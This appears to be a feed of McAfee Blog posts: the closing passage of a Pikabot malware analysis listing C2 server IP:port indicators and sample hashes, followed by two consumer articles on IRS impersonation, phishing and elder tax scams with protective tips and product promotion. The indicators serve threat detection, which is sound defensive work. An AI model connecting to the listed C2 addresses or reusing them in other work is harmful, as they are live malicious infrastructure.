Malware collects the data from the victim machine and sends it to the C2 server.

Figure 25. Network activity

PIKABOT performs network communication over HTTPS on non-traditional ports (2221, 2078, etc).

Figure 26. Network activity

C2 server communication:

Figure 27. C2 communication

IOCs:

C2 found in the payload are:

178.18.246.136:2078

86.38.225.106:2221

57.128.165.176:1372

File Type	SHA 256
ZIP	800fa26f895d65041ddf12c421b73eea7f452d32753f4972b05e6b12821c863a
HTML	9fc72bdf215a1ff8c22354aac4ad3c19b98a115e448cb60e1b9d3948af580c82
ZIP	4c29552b5fcd20e5ed8ec72dd345f2ea573e65412b65c99d897761d97c35ebfd
JS	9a4b89276c65d7f17c9568db5e5744ed94244be7ab222bedd8b64f25695ef849
EXE	89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9
ZIP	f3f1492d65b8422125846728b320681baa05a6928fbbd25b16fa28b352b1b512
EXE	aab0e74b9c6f1326d7ecea9a0de137c76d52914103763ac6751940693f26cbb1
XLSX	bcd3321b03c2cba73bddca46c8a509096083e428b81e88ed90b0b7d4bd3ba4f5
JS	49d8fb17458ca0e9eaff8e3b9f059a9f9cf474cc89190ba42ff4f1e683e09b72
ZIP	d4bc0db353dd0051792dd1bfd5a286d3f40d735e21554802978a97599205bd04
JAR	d26ab01b293b2d439a20d1dffc02a5c9f2523446d811192836e26d370a34d1b4
DLL	7b1c5147c903892f8888f91c98097c89e419ddcc89958a33e294e6dd192b6d4e

 

 

The post Distinctive Campaign Evolution of Pikabot Malware appeared first on McAfee Blog.

Watch Out For IRS Scams and Avoid Identity Theft

As taxpayers prepare their returns for April 15^th, scammers prepare too. They see tax season as high time to run all kinds of scams and identity theft schemes.

Fake accountants, fake tax software, robocalls, and more all make the list. We’ll give you a look at what’s happening out there right now. And we’ll run down several ways you can keep safe.

Impersonation Schemes

A commonly used tactic involves hackers posing as collectors from the IRS, as tax preparers, or government bureaus. This tactic is pretty effective due to Americans’ concerns about misfiling their taxes or accidentally running into trouble with the IRS. Scammers take advantage of this fear, manipulating innocent users into providing sensitive information or money over the phone or by email. And in extreme cases, hackers may be able to infect computers with malware via malicious links or attachments sent through IRS email scams.

Robocalls

Another tactic used to take advantage of taxpayers is the canceled social security number scam. Hackers use robocalls claiming that law enforcement will suspend or cancel the victim’s Social Security number in response to taxes owed. Often, victims are scared into calling the fraudulent numbers back and persuaded into transferring assets to accounts that the scammer controls. Users need to remember that the IRS will only contact taxpayers through snail mail or in person, not over the phone.

Emails

Another scam criminals use involves emails impersonating the IRS. Victims receive a phishing email claiming to be from the IRS, reminding them to file their taxes or offering them information about their tax refund via malicious links. If a victim clicks on the link, they will be redirected to a spoofed site that collects the victim’s personal data, facilitating identity theft. What’s more, a victim’s computer can become infected with malware if they click on a link with malicious code, allowing fraudsters to steal more data.

Phony CPAs

Scammers also take advantage of the fact that many users seek out the help of a tax preparer or CPA during this time. These criminals will often pose as professionals, accepting money to complete a user’s taxes but won’t sign the return. This makes it look like the user completed the return themselves. However, these ghost tax preparers often lie on the return to make the user qualify for credits they haven’t earned or apply changes that will get them in trouble. Since the scammers don’t sign, the victim will then be responsible for any errors. This could lead to the user having to repay money owed, or potentially lead to an audit.

While these types of scams can occur at any time of the year, they are especially prevalent leading up to the April tax filing due date. Consumers need to be on their toes during tax season to protect their personal information and keep their finances secure. To avoid being spoofed by scammers and identity thieves, follow these tips:

File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.

Keep an eye on your credit and your identity. Keeping tabs on your credit report and knowing if your personal information has been compromised in some way can help prevent tax fraud. Together, they can let you know if someone has stolen your identity or if you have personal info on the dark web that could lead to identity theft.

• Our credit monitoring servicecan keep an eye on changes to your credit score, report, and accounts with timely notifications and guidance so you can take action to tackle identity theft.
• Our identity monitoring servicechecks the dark web for your personal info, including email, government IDs, credit card and bank account info, and more—then provides alerts if your data is found on the dark web, an average of 10 months ahead of similar services.​

 

Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Remember: the IRS will not initiate contact with taxpayers by email, text messages, or social media channels to request personal or financial info. So someone contacts you that way, ignore the message.

Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.

Protect yourself from scam messages. Scammers also send links to scam sites via texts, social media messages, and email. Text Scam Detector can help you spot if the message you got is a fake. It uses AI technology that automatically detects links to scam URLs. If you accidentally click, don’t worry, it can block risky sites if you do.

Clean up your personal info online. Crooks and scammers have to find you before they can contact you. After all, they need to get your phone number or email from somewhere. Sometimes, that’s from “people finder” and online data brokers that gather and sell personal info to any buyer. Including crooks. McAfee Personal Data Cleanup can remove your personal info from the data broker sites scammers use to contact their victims.

Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

The post Watch Out For IRS Scams and Avoid Identity Theft appeared first on McAfee Blog.

How to Spot, and Prevent, the Tax Scams That Target Elders

How to Spot, and Prevent, the Tax Scams That Target Elders

Elder scams cost seniors in the U.S. some $3 billion annually. And tax season adds a healthy sum to that appalling figure.

What makes seniors such a prime target for tax scams? The Federal Bureau of Investigation (FBI) states several factors. For one, elders are typically trusting and polite. Additionally, many own their own home, have some manner of savings, and enjoy the benefits of good credit—all of which make for an ideal victim profile.

Also according to the FBI, elders may be less able or willing to report being scammed because they may not know the exact way in which they were scammed, or they may feel a sense of shame over it, or even some combination of the two. Moreover, being scammed may instill fear that family members will lose confidence in their ability to look after their own affairs.

If there’s one thing that we can do for our elders, it’s help them raise their critical hackles so they can spot these scams and stop them in their tracks, particularly around tax time. With that, let’s see how crooks target elders, what those scams look and feel like, along with the things we can do to keep ourselves and our loved ones from getting stung.

The IRS imposter scam

The phone rings, and an assertive voice admonishes an elder for non-payment of taxes. The readout on the caller ID shows “Internal Revenue Service” or “IRS,” the person cites an IRS badge number, and the victim is told to pay now via a wire transfer or prepaid gift card. The caller even knows the last four digits of their Social Security Number (SSN). This is a scam.

The caller, and the claim of non-payment, are 100 percent bogus. Even with those last four digits of the SSN attempting to add credibility, it’s still bogus. (Chances are, those last four digits were compromised elsewhere and ended up in the hands of the thieves by way of the black market or dark web so that they could use them in scams just like these.)

Some IRS imposter scams take it a step further. Fraudsters will threaten victims with arrest, deportation, or other legal action, like a lien on funds or the suspension of a driver’s license. They’ll make repeated calls as well, sometimes with additional imposters posing as law enforcement as a means of intimidating elders into payment.

The IRS will never threaten you or someone you know in such a way.

In fact, the IRS will never call you to demand payment. Nor will the IRS ever ask you to wire funds or pay with a gift card or prepaid debit card. And if the IRS claims you do owe funds, you will be notified of your rights as a taxpayer and be given the opportunity to make an appeal. If there’s any question about making payments to the IRS, the IRS has specific guidelines as to how to make a payment properly and safely on their official website.

It’s also helpful to know what the IRS will do in the event you owe taxes. In fact, they have an entire page that spells out how to know it’s really the IRS calling or knocking at your door. It’s a quick read and a worthwhile one at that.

In all, the IRS will contact you by mail or in person. Should you get one of these calls, hang up. Then, report it. I’ll include a list of ways you can file a report at the end of the article.

Tax scams and robocalls

Whether it’s a disembodied voice generated by a computer or a scripted message that’s been recorded by a person, robocalls provide scammers with another favorite avenue of attack. The approach is often quite like the phone scam outlined above, albeit less personalized because the attack is a canned robocall. However, robocalls allow crooks to cast a much larger net in the hopes of illegally wresting money away from victims. In effect, they can spam hundreds or thousands of people with one message in the hopes of landing a bite.

While perhaps not as personalized as other imposter scams, they can still create that innate sense of unease of being contacted by the IRS and harangue a victim into dialing a phony call center where they are further pressured into paying by wire or with a prepaid card, just like in other imposter scams. As above, your course of action here is to simply hang up and report it.

IRS email scams and phishing attacks

Here’s another popular attack. An elder gets an unsolicited email from what appears to be the IRS, yet isn’t. The phony email asks them to update or verify their personal or financial information for a payment or refund. The email may also contain an attachment which they are instructed to click and open. Again, all of these are scams.

Going back to what we talked about earlier, that’s not how the IRS will contact you. These are phishing attacks aimed at grifting prized personal and financial information that scammers can use to commit acts of theft or embezzlement. In the case of the attachment, it very well may contain malware that can do further harm to their device, finances, or personal information.

If you receive one of these emails, don’t open it. And certainly don’t open any attachments—which holds true for any unsolicited email you receive with an attachment.

Preventing tax scams from happening

Beyond simply knowing how to spot a possible attack, you can do several things to prevent one from happening in the first place.

Physical security

First let’s start with some good, old-fashioned physical security. You may also want to look into purchasing a locking mailbox. Mail and porch theft are still prevalent, and it’s not uncommon for thieves to harvest personal and financial information by simply lifting it from your mailbox.

Another cornerstone of physical security is shredding paper correspondence that contains personal or financial information, such as bills, medical documents, bank statements and so forth. I suggest investing a few dollars on an actual paper shredder, which are typically inexpensive if you look for a home model. If you have sensitive paper documents in bulk, such as old tax records that you no longer need to save, consider calling upon a professional service that can drive up to your home and do that high volume of shredding for you.

Likewise, consider the physical security of your digital devices. Make sure you lock your smartphones, tablets, and computers with a PIN or password. Losing a device is a terrible strain enough, let alone knowing that the personal and financial information on them could end up in the hands of a crook. Also see if tracking is available on your device. That way, enabling device tracking can help you locate a lost or stolen item.

Digital security

There are plenty of things you can do to protect yourself on the digital front too. Step one is installing comprehensive security software on your devices. This will safeguard you in several ways, such as email filters that will protect you from phishing attacks, features that will warn you of sketchy links and downloads, plus further protection for your identity and privacy—in addition to overall protection from viruses, malware, and other cyberattacks.

Additional features in comprehensive security software that can protect you from tax scams include:

• File encryption, which renders your most sensitive files into digital gibberish without the encryption key to translate them back.
• A digital file shredder that permanently deletes old files from your computer (simply dropping them into the desktop trashcan doesn’t do that—those files can be easily recovered).
• Identity theft protection, which monitors the dark web for your personal info that might have been leaked online and immediately alerts you if you might be at risk of fraud.

And here’s one item that certainly bears mentioning: dispose of your old technology securely. What’s on that old hard drive of yours? That old computer may contain loads of precious personal and financial info on it. Look into the e-waste disposal options in your community. There are services that will dispose of and recycle old technology while doing it in a secure manner so the data and info on your device doesn’t see the light of day again.

Spot a tax scam? Report it.

As said earlier, don’t let a bad deed go unreported. The IRS offers the following avenues of communication to report scams.

• Contact the Treasury Inspector General for Tax Administration to report a phone scam. Use their “IRS Impersonation Scam Reporting” web page. You can also call 800-366-4484.
• Report phone scams to the Federal Trade Commission. Use the “FTC Complaint Assistant” on FTC.gov. Please add “IRS Telephone Scam” in the notes.
• Report an unsolicited email claiming to be from the IRS, or an IRS-related component like the Electronic Federal Tax Payment System, to the IRS at phishing@irs.gov.

Stay safe this tax season!

In all, learning to recognize the scams that crooks aim at elders and putting some strong security measures in place can help prevent these crimes from happening to you or a loved one. Take a moment to act. It’s vital, because your personal information has a hefty price tag associated with it—both at tax time and any time.

The post How to Spot, and Prevent, the Tax Scams That Target Elders appeared first on McAfee Blog.